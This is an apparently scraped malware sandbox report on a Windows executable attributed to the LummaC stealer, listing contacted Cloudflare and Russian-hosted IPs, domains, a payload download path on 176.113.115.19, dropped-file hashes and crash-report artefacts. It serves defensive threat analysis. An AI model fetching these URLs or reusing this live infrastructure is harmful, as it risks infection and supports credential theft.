                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=1831.tmp.exe, 00000002.00000003.2078434280.0000000002F16000.00000004.00000800.00020000.00000000.sdmp, 1831.tmp.exe, 00000002.00000003.2078045127.0000000002F16000.00000004.00000800.00020000.00000000.sdmp, 1831.tmp.exe, 00000002.00000003.2077969426.0000000002F19000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs
                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          104.21.112.1
                                                                          cloudewahsj.shopUnited States
                                                                          13335CLOUDFLARENETUSfalse
                                                                          104.21.56.70
                                                                          post-to-me.comUnited States
                                                                          13335CLOUDFLARENETUSfalse
                                                                          176.113.115.19
                                                                          unknownRussian Federation
                                                                          49505SELECTELRUfalse
                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                          Analysis ID:1584360
                                                                          Start date and time:2025-01-05 08:58:30 +01:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 8m 17s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:default.jbs
                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                          Number of analysed new started processes analysed:9
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Sample name:K27Yg4V48M.exe
                                                                          renamed because original name is a hash value
                                                                          Original Sample Name:c1fdbf911e07304172569387f99a2adf.exe
                                                                          Detection:MAL
                                                                          Classification:mal100.troj.spyw.evad.winEXE@4/7@2/3
                                                                          EGA Information:
                                                                          • Successful, ratio: 100%
                                                                          HCA Information:
                                                                          • Successful, ratio: 95%
                                                                          • Number of executed functions: 47
                                                                          • Number of non-executed functions: 312
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .exe
                                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                          • Excluded IPs from analysis (whitelisted): 20.42.73.29, 40.126.31.71, 20.109.210.53, 13.107.246.45
                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                          • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                          TimeTypeDescription
                                                                          02:59:19API Interceptor8614829x Sleep call for process: K27Yg4V48M.exe modified
                                                                          02:59:23API Interceptor5x Sleep call for process: 1831.tmp.exe modified
                                                                          02:59:44API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          104.21.112.1SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                          • beammp.com/phpmyadmin/
                                                                          104.21.56.70IH5XqCdf06.exeGet hashmaliciousLummaCBrowse
                                                                            J18zxRjOes.exeGet hashmaliciousLummaCBrowse
                                                                              hpEAJnNwCB.exeGet hashmaliciousLummaCBrowse
                                                                                DG55Gu1yGM.exeGet hashmaliciousLummaCBrowse
                                                                                  he55PbvM2G.exeGet hashmaliciousLummaCBrowse
                                                                                    AZCFTWko2q.exeGet hashmaliciousLummaCBrowse
                                                                                      rHrG691f7q.exeGet hashmaliciousLummaCBrowse
                                                                                        XIaCqh1vRm.exeGet hashmaliciousLummaCBrowse
                                                                                          QQx0tdFC0b.exeGet hashmaliciousLummaCBrowse
                                                                                            LXS5itpTK7.exeGet hashmaliciousStealcBrowse
                                                                                              176.113.115.19IH5XqCdf06.exeGet hashmaliciousLummaCBrowse
                                                                                              • 176.113.115.19/ScreenUpdateSync.exe
                                                                                              J18zxRjOes.exeGet hashmaliciousLummaCBrowse
                                                                                              • 176.113.115.19/ScreenUpdateSync.exe
                                                                                              TUp6f2knn2.exeGet hashmaliciousLummaCBrowse
                                                                                              • 176.113.115.19/ScreenUpdateSync.exe
                                                                                              sqJIHyPqhr.exeGet hashmaliciousLummaCBrowse
                                                                                              • 176.113.115.19/ScreenUpdateSync.exe
                                                                                              InstallSetup.exeGet hashmaliciousLummaCBrowse
                                                                                              • 176.113.115.19/ScreenUpdateSync.exe
                                                                                              hpEAJnNwCB.exeGet hashmaliciousLummaCBrowse
                                                                                              • 176.113.115.19/ScreenUpdateSync.exe
                                                                                              DG55Gu1yGM.exeGet hashmaliciousLummaCBrowse
                                                                                              • 176.113.115.19/ScreenUpdateSync.exe
                                                                                              he55PbvM2G.exeGet hashmaliciousLummaCBrowse
                                                                                              • 176.113.115.19/ScreenUpdateSync.exe
                                                                                              wN8pQhRNnu.exeGet hashmaliciousLummaCBrowse
                                                                                              • 176.113.115.19/ScreenUpdateSync.exe
                                                                                              AZCFTWko2q.exeGet hashmaliciousLummaCBrowse
                                                                                              • 176.113.115.19/ScreenUpdateSync.exe
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              cloudewahsj.shopIH5XqCdf06.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.96.1
                                                                                              3jL3mqtjCn.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.48.1
                                                                                              J18zxRjOes.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.48.1
                                                                                              SOElePqvtf.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.64.1
                                                                                              m4lz5aeAiN.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.80.1
                                                                                              ehD7zv3l4U.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.112.1
                                                                                              rdFy6abQ61.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.96.1
                                                                                              7z91gvU.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.96.1
                                                                                              post-to-me.comIH5XqCdf06.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.56.70
                                                                                              J18zxRjOes.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.56.70
                                                                                              TUp6f2knn2.exeGet hashmaliciousLummaCBrowse
                                                                                              • 172.67.179.207
                                                                                              sqJIHyPqhr.exeGet hashmaliciousLummaCBrowse
                                                                                              • 172.67.179.207
                                                                                              InstallSetup.exeGet hashmaliciousLummaCBrowse
                                                                                              • 172.67.179.207
                                                                                              hpEAJnNwCB.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.56.70
                                                                                              DG55Gu1yGM.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.56.70
                                                                                              he55PbvM2G.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.56.70
                                                                                              wN8pQhRNnu.exeGet hashmaliciousLummaCBrowse
                                                                                              • 172.67.179.207
                                                                                              AZCFTWko2q.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.56.70
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              CLOUDFLARENETUShkMUtKbCqV.exeGet hashmaliciousUnknownBrowse
                                                                                              • 162.159.135.234
                                                                                              IH5XqCdf06.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.56.70
                                                                                              3LcZO15oTC.exeGet hashmaliciousUnknownBrowse
                                                                                              • 104.21.43.44
                                                                                              3jL3mqtjCn.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.48.1
                                                                                              3LcZO15oTC.exeGet hashmaliciousUnknownBrowse
                                                                                              • 172.67.219.93
                                                                                              elyho3x5zz.exeGet hashmaliciousUnknownBrowse
                                                                                              • 188.114.96.3
                                                                                              17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                              • 172.64.41.3
                                                                                              elyho3x5zz.exeGet hashmaliciousUnknownBrowse
                                                                                              • 188.114.96.3
                                                                                              Tax_Refund_Claim_2024_Australian_Taxation_Office.jsGet hashmaliciousRemcosBrowse
                                                                                              • 172.64.41.3
                                                                                              X9g8L63QGs.exeGet hashmaliciousBlank GrabberBrowse
                                                                                              • 162.159.137.232
                                                                                              SELECTELRUIH5XqCdf06.exeGet hashmaliciousLummaCBrowse
                                                                                              • 176.113.115.19
                                                                                              J18zxRjOes.exeGet hashmaliciousLummaCBrowse
                                                                                              • 176.113.115.19
                                                                                              176.113.115_1.170.ps1Get hashmaliciousXWormBrowse
                                                                                              • 176.113.115.170
                                                                                              botx.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                              • 178.132.202.249
                                                                                              TUp6f2knn2.exeGet hashmaliciousLummaCBrowse
                                                                                              • 176.113.115.19
                                                                                              sqJIHyPqhr.exeGet hashmaliciousLummaCBrowse
                                                                                              • 176.113.115.19
                                                                                              https://img10.reactor.cc/pics/post/full/Sakimichan-artist-Iono-(Pokemon)-Pok%c3%a9mon-7823638.jpegGet hashmaliciousHTMLPhisherBrowse
                                                                                              • 82.202.242.100
                                                                                              2.png.ps1Get hashmaliciousUnknownBrowse
                                                                                              • 176.113.115.178
                                                                                              1.png.ps1Get hashmaliciousUnknownBrowse
                                                                                              • 176.113.115.178
                                                                                              GO.png.ps1Get hashmaliciousUnknownBrowse
                                                                                              • 176.113.115.178
                                                                                              CLOUDFLARENETUShkMUtKbCqV.exeGet hashmaliciousUnknownBrowse
                                                                                              • 162.159.135.234
                                                                                              IH5XqCdf06.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.56.70
                                                                                              3LcZO15oTC.exeGet hashmaliciousUnknownBrowse
                                                                                              • 104.21.43.44
                                                                                              3jL3mqtjCn.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.48.1
                                                                                              3LcZO15oTC.exeGet hashmaliciousUnknownBrowse
                                                                                              • 172.67.219.93
                                                                                              elyho3x5zz.exeGet hashmaliciousUnknownBrowse
                                                                                              • 188.114.96.3
                                                                                              17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                              • 172.64.41.3
                                                                                              elyho3x5zz.exeGet hashmaliciousUnknownBrowse
                                                                                              • 188.114.96.3
                                                                                              Tax_Refund_Claim_2024_Australian_Taxation_Office.jsGet hashmaliciousRemcosBrowse
                                                                                              • 172.64.41.3
                                                                                              X9g8L63QGs.exeGet hashmaliciousBlank GrabberBrowse
                                                                                              • 162.159.137.232
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              a0e9f5d64349fb13191bc781f81f42e1IH5XqCdf06.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.112.1
                                                                                              3jL3mqtjCn.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.112.1
                                                                                              file.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                                                                                              • 104.21.112.1
                                                                                              J18zxRjOes.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.112.1
                                                                                              ZxSWvC0Tz7.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.112.1
                                                                                              SOElePqvtf.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.112.1
                                                                                              m4lz5aeAiN.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.112.1
                                                                                              ehD7zv3l4U.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.112.1
                                                                                              rdFy6abQ61.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.112.1
                                                                                              9cOUjp7ybm.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.112.1
                                                                                              37f463bf4616ecd445d4a1937da06e19IH5XqCdf06.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.56.70
                                                                                              Tax_Refund_Claim_2024_Australian_Taxation_Office.jsGet hashmaliciousRemcosBrowse
                                                                                              • 104.21.56.70
                                                                                              c2.htaGet hashmaliciousRemcosBrowse
                                                                                              • 104.21.56.70
                                                                                              file.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                              • 104.21.56.70
                                                                                              J18zxRjOes.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.56.70
                                                                                              HGwpjJUqhW.exeGet hashmaliciousGhostRatBrowse
                                                                                              • 104.21.56.70
                                                                                              http://www.cipassoitalia.it/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                              • 104.21.56.70
                                                                                              nv8401986_110422.exeGet hashmaliciousQjwmonkeyBrowse
                                                                                              • 104.21.56.70
                                                                                              adguardInstaller.exeGet hashmaliciousUnknownBrowse
                                                                                              • 104.21.56.70
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              C:\Users\user\AppData\Local\Temp\1831.tmp.exeIH5XqCdf06.exeGet hashmaliciousLummaCBrowse
                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exeIH5XqCdf06.exeGet hashmaliciousLummaCBrowse
                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):1.0591156598054272
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:e4F/ZAVYsRhcoD7Jf3QXIDcQUc6+cEHcw3H+HbHg/8BRTf3uOycr5WAU6NCUtW2n:bFGYD0K6tQjvEmF9zuiFceZ24IO8Bs
                                                                                                  MD5:3E398FAD4FCBBC03D4B291B0F5C01656
                                                                                                  SHA1:1E513105580FEC154BC4DD14D36F357C089B78F8
                                                                                                  SHA-256:1FE2E5AD0B6BE118D3920A927815E4A3387190F3F7F42B5D9ECE9DA7A47DF9B0
                                                                                                  SHA-512:802286CD1273C7D1376927AE9F9231C9701F24F2DEB60ED04C342E665B0527595C1114DC4E4764DF96DC24D40BF2556CCC806751993E5232B6F3E0999F2D41F0
                                                                                                  Malicious:true
                                                                                                  Reputation:low
                                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.5.3.7.5.7.0.1.1.7.2.7.3.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.5.3.7.5.7.0.6.1.7.2.7.5.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.7.6.1.5.8.0.7.-.d.1.f.2.-.4.4.6.d.-.9.3.d.7.-.f.1.d.5.3.a.3.1.1.4.3.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.a.0.7.3.d.a.e.-.9.d.8.c.-.4.a.4.f.-.b.3.a.8.-.8.5.3.4.b.f.8.c.8.d.5.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.1.8.3.1...t.m.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.9.c.-.0.0.0.1.-.0.0.1.4.-.c.f.1.8.-.b.5.b.a.4.7.5.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.1.8.7.3.9.d.5.8.d.8.a.7.b.f.b.3.e.6.a.5.9.b.8.4.c.f.d.1.b.6.3.0.0.0.0.f.f.f.f.!.0.0.0.0.2.d.8.9.6.9.1.d.4.9.1.a.2.e.c.3.f.1.5.9.1.1.4.0.6.a.2.2.1.a.d.1.3.5.e.9.6.4.e.8.!.1.8.3.1...t.m.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.
                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                  File Type:Mini DuMP crash report, 15 streams, Sun Jan 5 07:59:30 2025, 0x1205a4 type
                                                                                                  Category:dropped
                                                                                                  Size (bytes):110810
                                                                                                  Entropy (8bit):2.1878544784531924
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:Uy2n0TBNgLgY6iKIq1i32mGstKAHPW3VpzUJGETMB74VCDLh+:UT0TBI09Iqg32aMpYW0VCfh+
                                                                                                  MD5:FA5AE3621DB4D889B0C161921F14468C
                                                                                                  SHA1:578978EC253988D44778A2AA841FD02E7A209C20
                                                                                                  SHA-256:3B32D209F1C81228628511960AB5590D7B008AF0BD5D5671483DFA378AF793E0
                                                                                                  SHA-512:0EF8019B6F8E0D7340F1F64F550397ECD57FF773496AE3C238F668A916E7682369C0ABD8E5B77391F35DBB4E3B5A42BB08F3284A9CD6B8F85AC0BEA366DDA76A
                                                                                                  Malicious:false
                                                                                                  Reputation:low
                                                                                                  Preview:MDMP..a..... ........;zg........................p...............h$......T....N..........`.......8...........T...........HE...k...........$...........&..............................................................................eJ......p'......GenuineIntel............T............;zg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):8334
                                                                                                  Entropy (8bit):3.703409993824363
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:R6l7wVeJ1M6wvRo6Yci6vgmfJBpDG89bTUsfM9Rm:R6lXJ+6wvRo6YR6vgmfJ7THfv
                                                                                                  MD5:F1E03B5C572089A72A261B436F2BB197
                                                                                                  SHA1:808B26EC917A13A2CFF150CACC63F01A482203F6
                                                                                                  SHA-256:9FF112218CDC004660CFDF0E0DD2DCAAAE3DBB5D3DB525C6CF8F4B6E0C4A79F5
                                                                                                  SHA-512:8CCA1AA29046C8D3C77D798C3769254830015C7187B91CEFF79FEA8DC55862E6021122FDDE78CB2E7EEC11A5E2226E6DBDCE9D90C4D7245A79F85521C4FDA01E
                                                                                                  Malicious:false
                                                                                                  Reputation:low
                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.5.5.6.<./.P.i.
                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4613
                                                                                                  Entropy (8bit):4.479223828920193
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:cvIwWl8zsDJg77aI9BmWpW8VYIYm8M4JTxOqFr+q8/2O/dynWWd:uIjfdI7/n7V8J9HJqEWWd
                                                                                                  MD5:0142AD567A89BE4A468C02734B4630E3
                                                                                                  SHA1:883A761B6597A2D1186049E3390C208226791F71
                                                                                                  SHA-256:EC1CD0F2578B567B72B979760F58796CD3600FA86009015D13E834D7015CDF51
                                                                                                  SHA-512:6532A1DB76D15988FAD6A04A946145A8D1156FDBA3A6D653A50930923691B59072E9D22813CDC6F06EADB15AA4F9DD1F017631E57635FA029067CE44BC263249
                                                                                                  Malicious:false
                                                                                                  Reputation:low
                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="662342" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                  Process:C:\Users\user\Desktop\K27Yg4V48M.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):330240
                                                                                                  Entropy (8bit):7.351781479744392
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6144:vjv17LBCG5mOq+WEosDCrE/NKbO3gcbf2MPD6zqAZkVGDoJHk:vjd7dCEmOqTEos6MgAgcbJPQqASVGD
                                                                                                  MD5:E7A39D1C95A0D6EDCDA94874D38987C2
                                                                                                  SHA1:2D89691D491A2EC3F15911406A221AD135E964E8
                                                                                                  SHA-256:21A9481E7C550BAAFC82BA0CDD792A669A869AE7715993368EEACA800814CF90
                                                                                                  SHA-512:41059816703D71427E0E9ED6A260448F25808E00C159DE58EAA8F0D6A6538406BBFBF76C8D8FCC0653959175009C3B20187DDD02DD4F0CA5CD51CEDDE528485D
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 53%
                                                                                                  Joe Sandbox View:
                                                                                                  • Filename: IH5XqCdf06.exe, Detection: malicious, Browse
                                                                                                  Reputation:low
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........$..^El.^El.^El....._El.@...{El.@...DEl.@... El.y...YEl.^Em.$El.@..._El.@..._El.@..._El.Rich^El.................PE..L....0df.....................R......_D.......0....@.................................,^......................................<"..P.......`...........................................................x-..@............................................text...l........................... ..`.data........0...`... ..............@....rsrc...`...........................@..@........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\Desktop\K27Yg4V48M.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):330240
                                                                                                  Entropy (8bit):7.351781479744392
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6144:vjv17LBCG5mOq+WEosDCrE/NKbO3gcbf2MPD6zqAZkVGDoJHk:vjd7dCEmOqTEos6MgAgcbJPQqASVGD
                                                                                                  MD5:E7A39D1C95A0D6EDCDA94874D38987C2
                                                                                                  SHA1:2D89691D491A2EC3F15911406A221AD135E964E8
                                                                                                  SHA-256:21A9481E7C550BAAFC82BA0CDD792A669A869AE7715993368EEACA800814CF90
                                                                                                  SHA-512:41059816703D71427E0E9ED6A260448F25808E00C159DE58EAA8F0D6A6538406BBFBF76C8D8FCC0653959175009C3B20187DDD02DD4F0CA5CD51CEDDE528485D
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 53%
                                                                                                  Joe Sandbox View:
                                                                                                  • Filename: IH5XqCdf06.exe, Detection: malicious, Browse
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........$..^El.^El.^El....._El.@...{El.@...DEl.@... El.y...YEl.^Em.$El.@..._El.@..._El.@..._El.Rich^El.................PE..L....0df.....................R......_D.......0....@.................................,^......................................<"..P.......`...........................................................x-..@............................................text...l........................... ..`.data........0...`... ..............@....rsrc...`...........................@..@........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1835008
                                                                                                  Entropy (8bit):4.421484423128129
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6144:HSvfpi6ceLP/9skLmb0OT7WSPHaJG8nAgeMZMMhA2fX4WABlEnN30uhiTw:yvloT7W+EZMM6DFyt03w
                                                                                                  MD5:1A4327667FBD6B7513AEB2BF03B609C6
                                                                                                  SHA1:D176A1986313CF380A6A51B804DFF7CCC8CA749A
                                                                                                  SHA-256:B0A479FA610B7833C45EDD8C33B2E5AEFA807FBC039F48E437A451D878D7AC39
                                                                                                  SHA-512:C6E7BF5855E2B5C510BE8DCDB3DC3C46C630EB158ECD6E1585E9A9EBD598CD434F2C77D3945624BF036855587235E4E62483B87640B80342D21B33D695B987D8
                                                                                                  Malicious:false
                                                                                                  Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...G_............................................................................................................................................................................................................................................................................................................................................../...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Entropy (8bit):7.545645645421406
                                                                                                  TrID:
                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                  File name:K27Yg4V48M.exe
                                                                                                  File size:374'272 bytes
                                                                                                  MD5:c1fdbf911e07304172569387f99a2adf
                                                                                                  SHA1:f9fa5e30e7f1ae0bcb16229fea74dc25f6fe8ff4
                                                                                                  SHA256:40796079a899502d0afb6f82591909c3ce3c043a71616ecc906db42b9c4d2bfa
                                                                                                  SHA512:a2a1e04d74545ce75fb4a4c82b3667346cf49596dc650ddbc0953be1a4c231b87a8228c18479b4d662f4702a7e2b6660f68fe1e4a5f246ec67ae26bf1e3d9d31
                                                                                                  SSDEEP:6144:YpzwL9cHclk3j4j4lq3+7tlBIMEskRyYtm12jBKTR/Ab3:YxwxcHxbYufBx98rjBKib3
                                                                                                  TLSH:F98402227891D072C16B44B04876C7A16FBEFD225AA5D98777E8233D2F305C19B3A397
                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........$..^El.^El.^El....._El.@...{El.@...DEl.@... El.y...YEl.^Em.$El.@..._El.@..._El.@..._El.Rich^El.................PE..L.....'e...
                                                                                                  Icon Hash:46c7c30b0f4e0d59
                                                                                                  Entrypoint:0x40445f
                                                                                                  Entrypoint Section:.text
                                                                                                  Digitally signed:false
                                                                                                  Imagebase:0x400000
                                                                                                  Subsystem:windows gui
                                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                  DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                  Time Stamp:0x65279795 [Thu Oct 12 06:52:05 2023 UTC]
